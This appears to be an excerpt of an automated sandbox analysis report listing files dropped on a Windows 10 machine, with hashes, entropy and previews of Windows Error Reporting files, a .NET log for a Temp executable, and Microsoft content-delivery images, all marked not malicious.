                                                                                                                        SHA-256:D989F0538F980FD768B617972D05FAE1B361E1F8C4EB4E4212F8DB71A7CF9B73
                                                                                                                        SHA-512:385783DD10F08CF73203617B20A4964195E3323221474291499DCCAA2960488D27052FBD175516181A884C732C0DC6B92E4CEF49B8587082863C4C4E0F17DFB6
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.0.4.<./.P.i.d.>.......
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERE6F1.tmp.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4685
                                                                                                                        Entropy (8bit):4.478780568175464
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwSD8zsmJgtWI9h9WSC8BC8fm8M4Jd8qFx+q8vI89gERhdd:uITf8WMSN5JTKTgERhdd
                                                                                                                        MD5:5A603AD54A5E06BACD7B138A39BE046E
                                                                                                                        SHA1:58B7254947CAEF8F8808B08E9B8CB31618D7C9B0
                                                                                                                        SHA-256:7DF81C368A2989544FC6977AE0242FEA067BA507BAD0F659106E2E0ECA6CA2E3
                                                                                                                        SHA-512:09CC48B52225DC6267B4F73756C56C0EDDBD217532B2752F4F8D739D0366641C5ACF3CEC03CA3054B0B94C2283130687B3F4CD48463DCD25EFC8EEC9065EEEED
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342820" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERF935.tmp.csv
                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):55166
                                                                                                                        Entropy (8bit):3.063403298010223
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:MbHydL/jw6tEEQlhbZilVfBl8xfddAc8Vk:MbHydL/jw6tEEQlhbZilVfBmxfddAc8a
                                                                                                                        MD5:588FF1C6A720F668343C3545EC86C5EE
                                                                                                                        SHA1:DB8FFA83F59917EE1955379382ABD5C177ECEF25
                                                                                                                        SHA-256:AB38D23F75AFDF2F6913F4E07F668C7CA4C4BC2CF5FC620802DD956E4D5D71A5
                                                                                                                        SHA-512:C0C9AC910856431A969793280DAD81C9D0A80C42F8D32AFA48DCDAD8800513A27731807DD0E7332EF3830AA3F64D3238D4C15932BC3B3BE2CE743C4AC42F6C96
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8058.exe.log
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\8058.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):700
                                                                                                                        Entropy (8bit):5.346524082657112
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                        MD5:65CF801545098D915A06D8318D296A01
                                                                                                                        SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                        SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                        SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\0fcf02de-4ec7-4c4a-9f75-b190c4b2731b.c7c3e4c9-bbf8-40be-800f-a09c9aae178d.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1218
                                                                                                                        Entropy (8bit):3.589442580791056
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRipcTpWzgx71+8zsafc+Oc2CpXpPkX+vUViiBg5X3gebiL:LLD2mRiS6gvNzrfeIXpPkX+v8iiBg5Xq
                                                                                                                        MD5:ED6375356DBE3105FB3C6C285BB7BB61
                                                                                                                        SHA1:5B44C771F10C06AB6630EA9415D22B0ABF5072D9
                                                                                                                        SHA-256:B910022E06D2F1FEB8D961628DBA6EF12A63A492182EEBEE6C33077E6035BD0B
                                                                                                                        SHA-512:6525445A1750C62123EC52C830F22F93D79ABA02468C9A5E07ED49AE829EC4A1F1AE3B228DB239B867279134BF5C6FE3C97A3E44B2B64C3AFC62969D774D0391
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.8.j.Z.?.v.e.r.=.e.e.7.1...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.h.u.,. .1.3. .J.a.n. .2.0.2.2. .1.1.:.5.7.:.3.3. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .e.d.f.f.1.b.c.b.-.c.f.5.5.-.4.8.c.8.-.8.7.e.6.-.a.d.0.4.2.6.9.c.4.b.e.9...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.p.n.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.8.j.Z.?.v.e.r.=.e.e.7.1...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .1.5.5.2.0...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .1.5.5.2.0...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.l.i.c.,. .
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\0fcf02de-4ec7-4c4a-9f75-b190c4b2731b.down_data
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):15520
                                                                                                                        Entropy (8bit):1.896672757405903
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:x/6mM+k29W8sEvN4e4rxN+Y9rN+p4BCZxw/A/GQBC1GbGLxxVs4Psc5vH7CSpNvn:xS6kEWRvxNXrNQZqR+0Xsc5jhpNV4O
                                                                                                                        MD5:E3016B6D693EF6EB1BA9DA3078AE4730
                                                                                                                        SHA1:5AD0C746BD7B0DF41EBE31A8884A77E1208E6B01
                                                                                                                        SHA-256:D55321AE7A013B00941E36D12160D6596D616EBD68D2240866275C170BB822F9
                                                                                                                        SHA-512:737858FCB07EC6FED1014B9F58248AF81E3F21ED69CCF528365D77438F3284FCE6B2E3DBBD2EBBC318224F4E0C466453B558D3BD56359E66D4418C14DEA51A02
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: .PNG........IHDR..............w=.....pHYs...............:.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2017 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2017-05-17T14:41:35-07:00</xmp:CreateDate>. <xmp:ModifyDate>2017-05-17T14:43:52-07:00</xmp:ModifyDate>. <xmp:M
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\21013e79-9794-49b7-ae5b-fc5c992bd6bc.a214058d-4932-49cc-ab40-d730f65403f6.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.605918884002608
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRiw0oUWzgx71++Bisafc+Oc2CpXpjjX+vUViwzB+vFX3+vqbbL0D:LLD2mRiabgvJirfeIXpjjX+v8iqBCX3S
                                                                                                                        MD5:195D829E09800C81AE13EBEF1D5FCB05
                                                                                                                        SHA1:DDBC8B89C88BA51ABCB9C3E91E08EE956C2E40B8
                                                                                                                        SHA-256:AF908F5DE5D73626FEF4AEACE77887D9025A763E2B99B3AEBF05F56CDF5304C7
                                                                                                                        SHA-512:5C62BB28712F1BCA6AF00515DBB3BEB0081F52987C03F622CCC44595C30A5CE8BC935A398D0C2DFA8A9694F4C55BC5E07818CB1F9581EC020DC4BDD3357B3433
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.V.B.5.?.v.e.r.=.d.d.3.a...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.u.e.,. .1.1. .J.a.n. .2.0.2.2. .2.0.:.5.2.:.0.7. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .7.6.2.f.8.9.7.1.-.d.6.d.b.-.4.c.6.4.-.8.0.6.5.-.9.d.4.f.0.2.b.9.8.6.7.b...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.V.B.5.?.v.e.r.=.d.d.3.a...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .7.5.5.4.3.1...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .7.5.5.4.3.1...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\21013e79-9794-49b7-ae5b-fc5c992bd6bc.up_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):278
                                                                                                                        Entropy (8bit):3.40206142697723
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRmRL3:ZxMghwLtHSM1Sb9mSMXAvwRml
                                                                                                                        MD5:AEFA3D8CE597A555C0D1CC74126F7FA3
                                                                                                                        SHA1:BE33A552E7BDC93A5749190A28EC843C9E6ED768
                                                                                                                        SHA-256:6FD155BD2B31AFFEF15C8CE887B50ECBC912C0DD9C4113E2B76B6CDECCD0F6DA
                                                                                                                        SHA-512:A9594A9589B147F8451E3241B2497E195DA9F582FB264BF0BF9E84B3CFD7BB6934F97507891744D78114B197757485C7147F6AFF21F25E07F25D986AA59D3B09
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.V.B.5.?.v.e.r.=.d.d.3.a...........
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\27cc05ce-f6ae-4e8c-aa08-af3f678f3684.7e4aef61-82dc-4c05-85c3-81f1b0303abe.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.5787279232030773
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRiwQfO1Wzgx71+f+fYMYsafc+Oc2CpXpjjX+vUViwQjBWX3BbN+zP6D:LLD2mRiHWOgvELbrfeIXpjjX+v8iHjBq
                                                                                                                        MD5:8267193EA712F064D8D137F0ED94624D
                                                                                                                        SHA1:44176BFD36C7E0E23106020D1E266C3ECDDD74DF
                                                                                                                        SHA-256:589148B40E1EFEF193CA4EB5F35D1DC591FCB22898346A7CA8655A3E70633FCB
                                                                                                                        SHA-512:7BBF2908CDEC58D9A8EE1949CBC3636F7B8C69E30EFBDF27B2D434BCEDC6F6C2E894D6B69C2E62A1D4957B776D6658D68EDE88D7979A30FC8438D71E999F91E5
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.Y.e.S.?.v.e.r.=.0.9.d.6...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .F.r.i.,. .1.4. .J.a.n. .2.0.2.2. .1.3.:.0.9.:.4.7. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .0.8.1.5.2.c.d.8.-.c.d.a.3.-.4.1.0.e.-.8.e.7.c.-.d.a.c.2.c.1.6.a.0.c.8.8...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.Y.e.S.?.v.e.r.=.0.9.d.6...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .6.4.9.4.2.8...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .6.4.9.4.2.8...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\27cc05ce-f6ae-4e8c-aa08-af3f678f3684.down_data
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1080x1920, frames 3
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):649428
                                                                                                                        Entropy (8bit):7.7771944987396555
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:/ELaBE1ZTI1vJqS1WgOmA7l8uyksA+IHt3xQio2GqFrg+CoMSIsLvMJ7xOoHZ:SyrqSHOr/eBINa0GqFrg+x4sWUsZ
                                                                                                                        MD5:23F1E3C2429113D51CE85214A3EAA63C
                                                                                                                        SHA1:A4E2DA580347C6039F9145C3B8CAA960AB50762B
                                                                                                                        SHA-256:4C831289763620D63766F8C5E97CA92AB7AF0EEA912147C733FF447B1E476656
                                                                                                                        SHA-512:840EEDE18168026B2E48CE951A4F796D43FDA8E2C1E12F36D25AF6ED4C041E8F3B26B5D3A824AD41E22FF9B24A31EF9A79D6A8014AE6F3A32EC8D28217391DCA
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: ......JFIF.....`.`.....C....................................................................C.........................................................................8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...T..-..y.......0..j...H.t..t_.]V.%..?.!.G........o....O&.;.}.<.W.........|....y.G&.......X.|34.i.s...{.g..e.....O..........yj..}..H.??.........U..S.^.......(....G.o..2|.......Q..o<m.....<....\l;.H$..H.....WY....}.$..wd.^.....%?z..9)....=.e(.j...sz..qk.1.wWv..:I'.k..K.....c.-.....e.^.}.>;./.u.TK..#.....Q.mJu.8.v..$o.U.F.......Z.n..j.-..k$q......7.m,......8..R
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\28f286d4-7ba8-4d17-bd00-f85bb8c939a2.cc9fc646-c2fc-4fa6-88b0-56f3d96acf5a.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.5969448589373916
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRiDTXWzgx71+A8tzsafc+Oc2CpXpjjX+vUViXBGX3xbHckwU:LLD2mRiHwgvL8ZrfeIXpjjX+v8iXBGXJ
                                                                                                                        MD5:E88A4678CD98FF4C33ABE52268A7C0F1
                                                                                                                        SHA1:0ACC06763288CBD46231C1359D8C515A8F9E5DBF
                                                                                                                        SHA-256:BDBA791D2D197B661BA522F55DE509508C61FB7A3ADB24C187CF9F51E56C6E86
                                                                                                                        SHA-512:5A99D466C70AC3D5F0276E05EDF359450D3625FF6951226ADB2DDE453FB3BB06FABA7F97F4F4A1DA3738225BFC82313F864C9A8D8272A4380D90D4534882ECBB
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.u.h.o.?.v.e.r.=.a.d.3.8...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.h.u.,. .1.3. .J.a.n. .2.0.2.2. .2.3.:.2.1.:.5.3. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .4.0.d.b.9.f.5.a.-.0.5.5.5.-.4.3.6.a.-.b.6.3.5.-.c.c.b.9.6.e.b.b.8.e.9.5...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.u.h.o.?.v.e.r.=.a.d.3.8...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .1.7.2.7.9.8.7...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .1.7.2.7.9.8.7...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\28f286d4-7ba8-4d17-bd00-f85bb8c939a2.down_data
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 21.1 (Windows), datetime=2020:08:25 09:19:56]
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1727987
                                                                                                                        Entropy (8bit):7.00466959635563
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:04jNiVr4qua18zGlkrZEJEKBcM/pra/R0DGoGaGZUWcId0nR2pN6oyD3KVRIHZFm:04jNiVr4qWG5PS5p8oyWzcbX9KPt
                                                                                                                        MD5:16F8C62F063EB2B648E854B2DC08959A
                                                                                                                        SHA1:166743B3BCC6B7D50C507D2522E8F3C644D720A9
                                                                                                                        SHA-256:FB91AA134CD79665B6133C8943A052BBF660F21FC42FDD0FAFC78213DD3850B6
                                                                                                                        SHA-512:801930F6ED038B9E489D4A900DE52116989FF2CD938B42C8FB690E3CD431756777DC65DA5B0821D4FC55A95538388D0EDD32B51E9C81CA198F75F0BB55A7A1BD
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
